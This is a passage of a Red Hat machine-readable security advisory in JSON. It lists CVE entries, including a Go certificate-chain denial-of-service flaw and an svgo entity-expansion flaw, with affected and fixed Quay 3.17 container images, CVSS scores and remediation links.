            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "svgo: SVGO: Denial of Service via XML entity expansion"
    },
    {
      "cve": "CVE-2026-32280",
      "cwe": {
        "id": "CWE-770",
        "name": "Allocation of Resources Without Limits or Throttling"
      },
      "discovery_date": "2026-04-08T02:01:19.572351+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2456339"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in the Go standard library packages `crypto/x509` and `crypto/tls`. During the process of building a certificate chain, an attacker can provide a large number of intermediate certificates. This excessive input is not properly limited, leading to an uncontrolled amount of work being performed. This can result in a denial of service (DoS) condition, making the affected system or application unavailable to legitimate users.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "crypto/x509: crypto/tls: golang: Go: Denial of Service vulnerability in certificate chain building",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-32280"
        },
        {
          "category": "external",
          "summary": "RHBZ#2456339",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456339"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-32280",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32280"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32280",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32280"
        },
        {
          "category": "external",
          "summary": "https://go.dev/cl/758320",
          "url": "https://go.dev/cl/758320"
        },
        {
          "category": "external",
          "summary": "https://go.dev/issue/78282",
          "url": "https://go.dev/issue/78282"
        },
        {
          "category": "external",
          "summary": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU",
          "url": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU"
        },
        {
          "category": "external",
          "summary": "https://pkg.go.dev/vuln/GO-2026-4947",
          "url": "https://pkg.go.dev/vuln/GO-2026-4947"
        }
      ],
      "release_date": "2026-04-08T01:06:58.595000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T13:10:36+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22465"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "crypto/x509: crypto/tls: golang: Go: Denial of Service vulnerability in certificate chain building"
    },
    {
      "cve": "CVE-2026-32281",
      "cwe": {
        "id": "CWE-1050",
        "name": "Excessive Platform Resource Consumption within a Loop"
      },
      "discovery_date": "2026-04-08T02:01:00.930989+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
